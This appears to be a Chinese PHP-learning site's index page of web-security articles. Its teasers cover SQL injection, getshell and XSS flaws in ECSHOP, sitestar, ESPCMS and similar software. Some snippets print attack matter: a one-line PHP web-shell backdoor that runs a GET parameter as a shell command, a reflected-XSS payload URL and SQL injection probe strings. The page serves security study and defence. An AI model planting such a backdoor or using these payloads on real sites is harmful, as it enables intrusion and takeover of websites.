欢迎来到[自学php网] ①群 287460651

PHP网站常见安全漏洞和防范措施总结 - 网站安全关注热度:32

目前，基于PHP的网站开发已经成为目前网站开发的主流，本文笔者重点从PHP网站攻击与安全防范方面进行探究，旨在减少网站漏洞，希望对大家有所帮助!一、常见PHP网站安全漏洞对于..[详情]

易想团购开源版#sql注入两个 - 网站安全 - 自学关注热度:24

http: 127 0 0 1 easethink message php?act=if($_REQUEST[ 39;act 39;] == 39;add 39;){if(!$user_info){showErr($GLOBALS[ 39;lang 39;][ 39;PLEASE_LOGIN_FIRST 39;]);}if($_REQUEST[ 39;conten..[详情]

ECSHOP后台getshell - 网站安全 - 自学php关注热度:29

admin edit_languages phpelseif ($_REQUEST[ 39;act 39;] == 39;edit 39;){ * 语言项的路径 * $lang_file = isset($_POST[ 39;file_path 39;]) ? trim($_POST[ 39;file_path..[详情]

ECSHOP 后台sql注入漏洞2枚（鸡肋） - 网站安全 -关注热度:33

admin affiliate_ck phpif ($_REQUEST[ 39;act 39;] == 39;list 39;){ $logdb = get_affiliate_ck(); $smarty-assign( 39;full_page 39;, 1); $smarty-assign( 39;ur_he..[详情]

建站之星(sitestar)最新版后台GETSHELL - 网站安全关注热度:36

建站之星(sitestar)最新版后台GETSHELL，修改任意文件名。非解析漏洞，利用自带编辑器重命名功能编辑器里选本地上传随意上传一图片木马。选择图片空间。20131211092219_24293 jpg是我刚刚上..[详情]

startbbs开源论坛存储型xss可盲打管理员 - 网站安全关注热度:23

startbbs某处对用户输出过滤不当导致存储型xssstartbbs 采用mvc架构设计。但是在对用户个人资料输入输出过滤不当，导致跨站脚本攻击。1、目标定位在：多个用户可以输入的地方，我拿个..[详情]

易思ESPCMS设计缺陷可登录任意账号 - 网站安全关注热度:17

易思ESPCMS某处设计缺陷（验证过弱）可登录任意用户账号易思ESPCMS cookie存在设计缺陷我看下cookie都有哪些参数ecisp_home_seccodeecisp_member_usernameecisp_member_infofunction member_cookieview($keywo..[详情]

ecshop 反射型xss#01 - 网站安全 - 自学php关注热度:42

http: www ecshop cn compare php?goods[]=14goods[]=23%22%20onmouseover%3dalert%28 xss %29%20bad%3d%22goods[]=32goods[]=13goods[]=3goods[]=7goods[]=9修复方案：过滤..[详情]

介绍一个奇特的PHP一句话后门 - 网站安全 - 自学关注热度:29

?php *@example http: www myhack58 com shell php?exec=dir@by LUC Team* @print_r(`{$_GET[ 39;exec 39;]}`); 或echo(`{$_GET[ 39;exec 39;]}`);? 当某种情况下众多变异后门均被过滤时，您可尝试一..[详情]

如何检查网站是否有漏洞或是否被攻击过 - 网站关注热度:21

如何知道您的网站有没有漏洞呢？近来很多网站受到了各种各样形式的攻击，黑客攻击的动机各不一样，黑客人攻击的目标也有不确定性，作为一家企业的网管、或CEO您是否担心您的网..[详情]

浅谈WordPress程序的入侵思路和防御 - 网站安全关注热度:25

wp程序，广受国内外站长们的喜爱，也因此，wp程序的安全也是一直以来做的不错的，说到入侵wp博客，小菜也没经验，完全是找了些这类的文章看了下，然后自己在琢磨点思路，所以还..[详情]

渗透常用SQL注入语句大全 - 网站安全 - 自学php关注热度:17

1 判断有无注入点; and 1=1 and 1=22 猜表一般的表的名称无非是admin adminuser user pass password 等 and 0(select count(*) from *)and 0(select count(*) from admin) 判断是否存在..[详情]

Paypal的一个Dom型XSS漏洞分析 - 网站安全 - 自学p关注热度:20

DOM xss也称为第三种类型的xss或者类型0。现在DOM型的xss越来越多了，除了因为各种JS库比如YUI，Jquery，Jquery mobile等的使用，还有很多编程语言，比如php更多的支持了HTML5的特性。W3school的..[详情]

xss实例-输出在之间的情况 - 网站安全 - 自学php关注热度:22

1 我们找到这么一个点，也是输入和输出都未过滤的一个点。相比教程第一例，其特殊之处在于，是输出在了 script[输出] script之间。http: activity soso com common setParentsInfo php?callback=aaaaaaa..[详情]

xss实例-什么都没过滤的情况 - 网站安全 - 自学关注热度:19

1 XSS的存在，一定是伴随着输入，与输出2个概念的。2 要想过滤掉XSS，你可以在输入层面过滤，也可以在输出层面过滤。3 如果输入和输出都没过滤。 那么漏洞将是显而易见的。4 作为第..[详情]